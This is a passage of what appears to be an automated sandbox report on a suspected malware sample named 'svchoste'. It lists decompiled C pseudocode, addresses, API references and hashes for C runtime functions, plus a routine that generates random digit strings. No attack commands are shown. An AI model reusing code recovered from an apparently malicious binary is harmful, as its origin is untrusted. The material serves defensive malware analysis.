													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t125 + 0xc;
													 *_t72 =  *(_t125 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t125 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t124 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t124 = _t104;
										}
										__eflags = _t124 - _v8;
										if(_t124 > _v8) {
											goto L41;
										} else {
											E00B7518C(_t112, _v12, _v8,  *_t125, _t124);
											 *(_t125 + 4) =  *(_t125 + 4) - _t124;
											 *_t125 =  *_t125 + _t124;
											_v12 = _v12 + _t124;
											_t109 = _t109 - _t124;
											_t126 = _t126 + 0x10;
											_v8 = _v8 - _t124;
											_t123 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t122;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00B75A49(_t130))) = 0x16;
					goto L4;
				}
			}

0x00b761d9
0x00b761dd
0x00b761e2
0x00b761e5
0x00b761e8
0x00b761ed
0x00b76209
0x00000000
0x00b761f5
0x00b761f5
0x00b761f7
0x00b76210
0x00b76213
0x00b76215
0x00b76223
0x00b76223
0x00b76226
0x00b7622c
0x00b76231
0x00b76231
0x00b76234
0x00b76236
0x00000000
0x00b76238
0x00b7623f
0x00b76242
0x00000000
0x00000000
0x00b76244
0x00b76244
0x00b76248
0x00b7624f
0x00b76252
0x00b76254
0x00b7625e
0x00b76256
0x00b76259
0x00b76259
0x00b76265
0x00b76267
0x00b76347
0x00000000
0x00b7626d
0x00b7626d
0x00b7626d
0x00b76274
0x00b762ba
0x00b762ba
0x00b762bd
0x00b7631c
0x00b76322
0x00b76325
0x00b76379
0x00000000
0x00b7637f
0x00b76327
0x00b7632b
0x00b7634f
0x00b7634f
0x00b76353
0x00b7635d
0x00b76362
0x00b7636a
0x00b76204
0x00b76204
0x00000000
0x00b76204
0x00b7632d
0x00b76330
0x00b76333
0x00b76338
0x00b76339
0x00b76339
0x00b76339
0x00b7633c
0x00000000
0x00b7633c
0x00b762bf
0x00b762c3
0x00b762e4
0x00b762e9
0x00b762eb
0x00b762ed
0x00b762ed
0x00b762c5
0x00b762cc
0x00b762ce
0x00b762db
0x00b762db
0x00b762db
0x00b762de
0x00b762d0
0x00b762d2
0x00b762d5
0x00b762d5
0x00b762e0
0x00b762e0
0x00b762ef
0x00b762f2
0x00000000
0x00b762f4
0x00b762f4
0x00b762f5
0x00b762f9
0x00b762fe
0x00b762ff
0x00b76300
0x00b76305
0x00b76308
0x00b7630a
0x00b76387
0x00000000
0x00b76387
0x00b7630c
0x00b7630f
0x00b76375
0x00b76375
0x00b76375
0x00b76375
0x00000000
0x00b76375
0x00b76311
0x00b76314
0x00b76316
0x00000000
0x00b76316
0x00b762f2
0x00b76276
0x00b76279
0x00b7627b
0x00000000
0x00000000
0x00b7627d
0x00000000
0x00000000
0x00b76283
0x00b76285
0x00b76287
0x00b76289
0x00b76289
0x00b7628b
0x00b7628e
0x00000000
0x00b76294
0x00b7629d
0x00b762a2
0x00b762a5
0x00b762a7
0x00b762aa
0x00b762ac
0x00b762af
0x00b762b2
0x00b762b2
0x00b7633f
0x00b7633f
0x00b7633f
0x00000000
0x00b7626d
0x00b76267
0x00b76236
0x00b7621c
0x00b7621e
0x00b76221
0x00000000
0x00000000
0x00000000
0x00b76221
0x00b761f9
0x00b761fe
0x00000000
0x00b761fe

APIs

_memset.LIBCMT ref: 00B7622C
_memcpy_s.LIBCMT ref: 00B7629D
__read.LIBCMT ref: 00B76300
__filbuf.LIBCMT ref: 00B7631C

Part of subcall function 00B75A49: __getptd_noexit.LIBCMT ref: 00B75A49

_memset.LIBCMT ref: 00B7635D

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 0cf97bb49f6c97081f8a1c80fee2c433a59ae391689aac8020b9d3edf1ee0f1c
Instruction ID: 347c8a454fef3fc3ec3ae066bddd15e0ba67b2a886ea3e64c88cf7011c4b18cc
Opcode Fuzzy Hash: 0cf97bb49f6c97081f8a1c80fee2c433a59ae391689aac8020b9d3edf1ee0f1c
Instruction Fuzzy Hash: EB519631A00A05EFCB649FA9888469DBBF1EF40320F25C6ADE83DA6191D770DD51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B7F522, Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00B7F522(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0xba149c, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0xba1ac8 - _t7;
								if(__eflags == 0) {
									_t9 = E00B75A49(__eflags);
									 *_t9 = E00B75A07(GetLastError());
									goto L17;
								} else {
									__eflags = E00B78F17(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00B75A49(__eflags);
										 *_t12 = E00B75A07(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00B78F17(_t6, _t30);
						 *((intOrPtr*)(E00B75A49(__eflags))) = 0xc;
						goto L12;
					} else {
						E00B75341(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00B7537B(__edx, __edi, __esi, _a8);
				}
			}

0x00b7f52b
0x00b7f538
0x00b7f539
0x00b7f53c
0x00b7f53e
0x00b7f54d
0x00b7f580
0x00b7f580
0x00b7f583
0x00000000
0x00000000
0x00b7f550
0x00b7f552
0x00b7f554
0x00b7f554
0x00b7f554
0x00b7f561
0x00b7f567
0x00b7f569
0x00b7f56b
0x00b7f5cb
0x00b7f5cb
0x00b7f56d
0x00b7f56d
0x00b7f573
0x00b7f5b5
0x00b7f5c9
0x00000000
0x00b7f575
0x00b7f57c
0x00b7f57e
0x00b7f59d
0x00b7f5b1
0x00b7f597
0x00b7f597
0x00b7f597
0x00000000
0x00000000
0x00000000
0x00b7f57e
0x00b7f573
0x00000000
0x00b7f599
0x00b7f586
0x00b7f591
0x00000000
0x00b7f540
0x00b7f543
0x00b7f549
0x00b7f549
0x00b7f59a
0x00b7f59c
0x00b7f52d
0x00b7f537
0x00b7f537

APIs

_malloc.LIBCMT ref: 00B7F530

Part of subcall function 00B7537B: __FF_MSGBANNER.LIBCMT ref: 00B75394
Part of subcall function 00B7537B: __NMSG_WRITE.LIBCMT ref: 00B7539B
Part of subcall function 00B7537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00B746A4,00000001,00000000,?,?,?,00B74702,?), ref: 00B753C0

_free.LIBCMT ref: 00B7F543

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: ebe5ff303fd2017b7a31e03c514d9b69c28ea2e9d2ea261b542fc10b231123fe
Instruction ID: b7afc3238ee3ee896153c30512fc53be800b971f85bfe9fa659e42e68faf3f77
Opcode Fuzzy Hash: ebe5ff303fd2017b7a31e03c514d9b69c28ea2e9d2ea261b542fc10b231123fe
Instruction Fuzzy Hash: AF118632444612ABCB356FB9E845A7937D5EB643A0F20C5B6F87D97151EF708C404658

Uniqueness

Uniqueness Score: -1.00%

Function 00B78222, Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00B78222(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0xb9de10);
				E00B78C20(__ebx, __edi, __esi);
				_t28 = E00B7844B(__edx, __edi, _t31);
				_t12 =  *0xba0720; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00B7B23F(0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00B781D5(_t29,  *0xba0968);
					 *(_t30 - 4) = 0xfffffffe;
					E00B7828F();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00B7844B(__edx, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					E00B78BF8(_t20, _t25, _t26, _t29, _t34, 0x20);
				}
				return E00B78C65(_t29);
			}

0x00b78222
0x00b78222
0x00b78222
0x00b78222
0x00b78222
0x00b78224
0x00b78229
0x00b78233
0x00b78235
0x00b7823d
0x00b78261
0x00b78263
0x00b78269
0x00b78273
0x00b7827e
0x00b78281
0x00b78288
0x00b7823f
0x00b7823f
0x00b78243
0x00000000
0x00b78245
0x00b7824a
0x00b7824a
0x00b78243
0x00b7824d
0x00b7824f
0x00b78253
0x00b78258
0x00b78260

APIs

__getptd.LIBCMT ref: 00B7822E

Part of subcall function 00B7844B: __getptd_noexit.LIBCMT ref: 00B7844E
Part of subcall function 00B7844B: __amsg_exit.LIBCMT ref: 00B7845B

__getptd.LIBCMT ref: 00B78245
__amsg_exit.LIBCMT ref: 00B78253
__lock.LIBCMT ref: 00B78263
__updatetlocinfoEx_nolock.LIBCMT ref: 00B78277

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 8ec94729dd00ede06206f46cc8df48f907ccae3ece62f2778908d42853b98e3e
Instruction ID: 3f21101d8e2c3f3d0527d0113f08b3658b8e66c628c3d3acbce19ef0face9230
Opcode Fuzzy Hash: 8ec94729dd00ede06206f46cc8df48f907ccae3ece62f2778908d42853b98e3e
Instruction Fuzzy Hash: 10F06232AC5A009ADA21BBA8540BB5927D0AF01721F10C1C9E42DA72D3CF7459018A66

Uniqueness

Uniqueness Score: -1.00%

Function 00B76DD7, Relevance: 6.2, APIs: 4, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00B76DD7(void* __ebx, void* __edi, signed char* _a4, signed int _a8, intOrPtr _a12) {
				signed int _v7;
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int _t72;
				signed int _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				signed short _t82;
				void* _t84;
				signed short _t87;
				intOrPtr _t91;
				signed int _t97;
				signed int _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				signed int _t104;
				signed char* _t114;
				signed char* _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				void* _t127;

				E00B74BBD(__ebx,  &_v24, __edi, _a12);
				_t114 = _a4;
				_t129 = _t114;
				if(_t114 != 0) {
					_push(__ebx);
					_t97 = _a8;
					__eflags = _t97;
					if(__eflags != 0) {
						_t72 = _v20;
						__eflags =  *(_t72 + 8);
						if( *(_t72 + 8) != 0) {
							_push(__edi);
							while(1) {
								_t100 =  *_t114 & 0x000000ff;
								_t124 = _t100 & 0x000000ff;
								_t115 =  &(_t114[1]);
								__eflags =  *(_t124 + _t72 + 0x1d) & 0x00000004;
								_a4 = _t115;
								if(( *(_t124 + _t72 + 0x1d) & 0x00000004) == 0) {
									goto L20;
								}
								__eflags =  *_t115;
								if(__eflags != 0) {
									_t84 = E00B7E53F(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t115 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
									_t127 = _t127 + 0x24;
									__eflags = _t84 - 1;
									if(_t84 != 1) {
										__eflags = _t84 - 2;
										if(__eflags != 0) {
											goto L37;
										} else {
											_t87 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
											__eflags = _t87;
											_t125 = _t87 & 0x0000ffff;
											goto L19;
										}
									} else {
										_t125 = _v8 & 0x000000ff;
										L19:
										_a4 =  &(_a4[1]);
										_t72 = _v20;
										goto L23;
									}
								} else {
									_t125 = 0;
									L23:
									_t102 =  *_t97 & 0x000000ff;
									_t117 = _t102 & 0x000000ff;
									_t97 = _t97 + 1;
									__eflags =  *(_t117 + _t72 + 0x1d) & 0x00000004;
									if(( *(_t117 + _t72 + 0x1d) & 0x00000004) == 0) {
										_t118 = _t102;
										_t103 = _t118 + _t72;
										__eflags =  *(_t103 + 0x1d) & 0x00000010;
										if(( *(_t103 + 0x1d) & 0x00000010) == 0) {
											_t104 = _t118;
										} else {
											_t104 =  *(_t103 + 0x11d) & 0x000000ff;
										}
										goto L34;
									} else {
										__eflags =  *_t97;
										if(__eflags != 0) {
											_t77 = E00B7E53F(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t97 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
											_t127 = _t127 + 0x24;
											__eflags = _t77 - 1;
											if(_t77 != 1) {
												__eflags = _t77 - 2;
												if(__eflags != 0) {
													L37:
													 *((intOrPtr*)(E00B75A49(__eflags))) = 0x16;
													__eflags = _v12;
													if(_v12 != 0) {
														_t79 = _v16;
														_t61 = _t79 + 0x70;
														 *_t61 =  *(_t79 + 0x70) & 0xfffffffd;
														__eflags =  *_t61;
													}
													_t74 = 0x7fffffff;
												} else {
													_t82 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
													__eflags = _t82;
													_t104 = _t82 & 0x0000ffff;
													goto L30;
												}
											} else {
												_t104 = _v8 & 0x000000ff;
												L30:
												_t72 = _v20;
												_t97 = _t97 + 1;
												goto L34;
											}
										} else {
											_t104 = 0;
											L34:
											__eflags = _t104 - _t125;
											if(_t104 != _t125) {
												asm("sbb eax, eax");
												_t74 = (_t72 & 0x00000002) - 1;
												__eflags = _v12;
												if(_v12 != 0) {
													 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
												}
											} else {
												__eflags = _t125;
												if(_t125 == 0) {
													__eflags = _v12;
													if(_v12 != 0) {
														_t75 = _v16;
														_t69 = _t75 + 0x70;
														 *_t69 =  *(_t75 + 0x70) & 0xfffffffd;
														__eflags =  *_t69;
													}
													_t74 = 0;
													__eflags = 0;
												} else {
													_t114 = _a4;
													continue;
												}
											}
										}
									}
								}
								goto L46;
								L20:
								_t116 = _t100;
								_t101 = _t116 + _t72;
								__eflags =  *(_t101 + 0x1d) & 0x00000010;
								if(( *(_t101 + 0x1d) & 0x00000010) == 0) {
									_t125 = _t116;
								} else {
									_t125 =  *(_t101 + 0x11d) & 0x000000ff;
								}
								goto L23;
							}
						} else {
							_t74 = E00B7523A(_t114, __edi, _t114, _t97,  &_v24);
							__eflags = _v12;
							if(_v12 != 0) {
								 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
							}
						}
					} else {
						 *((intOrPtr*)(E00B75A49(__eflags))) = 0x16;
						E00B77461();
						__eflags = _v12 - _t97;
						if(_v12 != _t97) {
							_t91 = _v16;
							_t11 = _t91 + 0x70;
							 *_t11 =  *(_t91 + 0x70) & 0xfffffffd;
							__eflags =  *_t11;
						}
						_t74 = 0x7fffffff;
					}
					L46:
					return _t74;
				} else {
					 *((intOrPtr*)(E00B75A49(_t129))) = 0x16;
					E00B77461();
					if(_v12 != 0) {
						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
					}
					return 0x7fffffff;
				}
			}

0x00b76de5
0x00b76dea
0x00b76ded
0x00b76def
0x00b76e15
0x00b76e16
0x00b76e19
0x00b76e1b
0x00b76e43
0x00b76e46
0x00b76e4a
0x00b76e70
0x00b76e77
0x00b76e77
0x00b76e7a
0x00b76e7d
0x00b76e7e
0x00b76e83
0x00b76e86
0x00000000
0x00000000
0x00b76e88
0x00b76e8b
0x00b76ea8
0x00b76ead
0x00b76eb0
0x00b76eb3
0x00b76ebb
0x00b76ebe
0x00000000
0x00b76ec4
0x00b76ed5
0x00b76ed5
0x00b76ed8
0x00000000
0x00b76ed8
0x00b76eb5
0x00b76eb5
0x00b76edb
0x00b76edb
0x00b76ede
0x00000000
0x00b76ede
0x00b76e8d
0x00b76e8d
0x00b76ef9
0x00b76ef9
0x00b76efc
0x00b76eff
0x00b76f00
0x00b76f05
0x00b76f5e
0x00b76f60
0x00b76f63
0x00b76f67
0x00b76f72
0x00b76f69
0x00b76f69
0x00b76f69
0x00000000
0x00b76f07
0x00b76f07
0x00b76f0a
0x00b76f29
0x00b76f2e
0x00b76f31
0x00b76f34
0x00b76f3c
0x00b76f3f
0x00b76f86
0x00b76f8b
0x00b76f91
0x00b76f95
0x00b76f97
0x00b76f9a
0x00b76f9a
0x00b76f9a
0x00b76f9a
0x00b76f9e
0x00b76f41
0x00b76f52
0x00b76f52
0x00b76f55
0x00000000
0x00b76f55
0x00b76f36
0x00b76f36
0x00b76f58
0x00b76f58
0x00b76f5b
0x00000000
0x00b76f5b
0x00b76f0c
0x00b76f0c
0x00b76f74
0x00b76f74
0x00b76f77
0x00b76fa5
0x00b76faa
0x00b76fab
0x00b76faf
0x00b76fb4
0x00b76fb4
0x00b76f79
0x00b76f79
0x00b76f7c
0x00b76fba
0x00b76fbe
0x00b76fc0
0x00b76fc3
0x00b76fc3
0x00b76fc3
0x00b76fc3
0x00b76fc7
0x00b76fc7
0x00b76f7e
0x00b76f7e
0x00000000
0x00b76f7e
0x00b76f7c
0x00b76f77
0x00b76f0a
0x00b76f05
0x00000000
0x00b76ee3
0x00b76ee3
0x00b76ee5
0x00b76ee8
0x00b76eec
0x00b76ef7
0x00b76eee
0x00b76eee
0x00b76eee
0x00000000
0x00b76eec
0x00b76e4c
0x00b76e52
0x00b76e5a
0x00b76e5e
0x00b76e67
0x00b76e67
0x00b76e5e
0x00b76e1d
0x00b76e22
0x00b76e28
0x00b76e2d
0x00b76e30
0x00b76e32
0x00b76e35
0x00b76e35
0x00b76e35
0x00b76e35
0x00b76e39
0x00b76e39
0x00b76fcb
0x00b76fcd
0x00b76df1
0x00b76df6
0x00b76dfc
0x00b76e05
0x00b76e0a
0x00b76e0a
0x00b76e14
0x00b76e14

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B76DE5

Part of subcall function 00B74BBD: __getptd.LIBCMT ref: 00B74BD0

Part of subcall function 00B75A49: __getptd_noexit.LIBCMT ref: 00B75A49

__stricmp_l.LIBCMT ref: 00B76E52

Part of subcall function 00B7523A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B75249

___crtLCMapStringA.LIBCMT ref: 00B76EA8
___crtLCMapStringA.LIBCMT ref: 00B76F29

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 5b4e5cb6d36eafff8e4d5da37fd9b8f9255a38704f12a10a44c2eb4e80d90e02
Instruction ID: 15f76552c7f06a7059533da934539100aaa4d90d345280bb1ebe2ae2b0d76860
Opcode Fuzzy Hash: 5b4e5cb6d36eafff8e4d5da37fd9b8f9255a38704f12a10a44c2eb4e80d90e02
Instruction Fuzzy Hash: C6512770904699ABDF299BA8C485BBD7BF0EB01324F28C2D9F0B95E1D2D7308E45D760

Uniqueness

Uniqueness Score: -1.00%

Function 00B8290D, Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00B8290D(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				void* __ebx;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00B74BBD(0,  &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00B7AEAB( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00B75A49(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00b82917
0x00b8291e
0x00b82935
0x00000000
0x00b82925
0x00b82927
0x00b82941
0x00b82946
0x00b82949
0x00b8294c
0x00b82974
0x00b8297b
0x00b8297d
0x00b829fe
0x00b82a19
0x00b82a1b
0x00b8295b
0x00b8295b
0x00b8295e
0x00b82960
0x00b82963
0x00b82963
0x00b82963
0x00b82963
0x00000000
0x00b82969
0x00b829dd
0x00b829dd
0x00b829e2
0x00b829e8
0x00b829eb
0x00b829ed
0x00b829f0
0x00b829f0
0x00b829f0
0x00b829f0
0x00000000
0x00b829f4
0x00b8297f
0x00b82982
0x00b82988
0x00b8298b
0x00b829b2
0x00b829b5
0x00b829bb
0x00000000
0x00000000
0x00b829bd
0x00b829c0
0x00000000
0x00000000
0x00b829c2
0x00b829c2
0x00b829c8
0x00b829cb
0x00b8293a
0x00b8293a
0x00b829d4
0x00000000
0x00b829d4
0x00b8298d
0x00b82990
0x00000000
0x00000000
0x00b82994
0x00b829a5
0x00b829ab
0x00b829ad
0x00b829b0
0x00000000
0x00000000
0x00000000
0x00b829b0
0x00b8294e
0x00b82951
0x00b82953
0x00b82958
0x00b82958
0x00000000
0x00b82929
0x00b82929
0x00b8292e
0x00b82932
0x00b82932
0x00000000
0x00b8292e
0x00b82927

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B82941
__isleadbyte_l.LIBCMT ref: 00B82974
MultiByteToWideChar.KERNEL32(00000080,00000009,00B76050,?,00000000,00000000,?,?,?,?,00B76050), ref: 00B829A5
MultiByteToWideChar.KERNEL32(00000080,00000009,00B76050,00000001,00000000,00000000,?,?,?,?,00B76050), ref: 00B82A13

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 16709f8cab728d5b6feb73594a9c1fb4c589e1a912a948ac04162c665e347ec0
Instruction ID: 8cb1df18b0bfaed2fe59a8d3901aa1d6cb336382f460af598013a6390da089e1
Opcode Fuzzy Hash: 16709f8cab728d5b6feb73594a9c1fb4c589e1a912a948ac04162c665e347ec0
Instruction Fuzzy Hash: AD318D31A04296EFDB20EFA4C895ABA3BF5EF45310F1485F9E4A59B1A1D730DD80EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A580, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B8A580(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				CHAR* _v12;
				signed int _t24;
				CHAR* _t26;
				CHAR* _t33;
				void* _t40;
				void* _t42;

				_v12 = E00B7537B(__edx, __edi, __esi, _a4);
				 *_v12 = 0;
				E00B76DA4(GetTickCount());
				_t42 = _t40 + 8;
				_v8 = 0;
				while(1) {
					_t44 = _v8 - _a4;
					if(_v8 >= _a4) {
						break;
					}
					_t24 = E00B76DB6(_t44);
					asm("cdq");
					_t26 =  *0xba25ac; // 0x2d07478
					wsprintfA(_v12, _t26, _v12, _t24 % 0xa);
					_t42 = _t42 + 0x10;
					_v8 = _v8 + 1;
				}
				_t33 =  &(_v12[_v8]);
				__eflags = _t33;
				 *_t33 = 0;
				return _v12;
			}

0x00b8a592
0x00b8a598
0x00b8a5a2
0x00b8a5a7
0x00b8a5aa
0x00b8a5bc
0x00b8a5bf
0x00b8a5c2
0x00000000
0x00000000
0x00b8a5c4
0x00b8a5c9
0x00b8a5d6
0x00b8a5e0
0x00b8a5e6
0x00b8a5b9
0x00b8a5b9
0x00b8a5ee
0x00b8a5ee
0x00b8a5f1
0x00b8a5fa

APIs

_malloc.LIBCMT ref: 00B8A58A

Part of subcall function 00B7537B: __FF_MSGBANNER.LIBCMT ref: 00B75394
Part of subcall function 00B7537B: __NMSG_WRITE.LIBCMT ref: 00B7539B
Part of subcall function 00B7537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00B746A4,00000001,00000000,?,?,?,00B74702,?), ref: 00B753C0

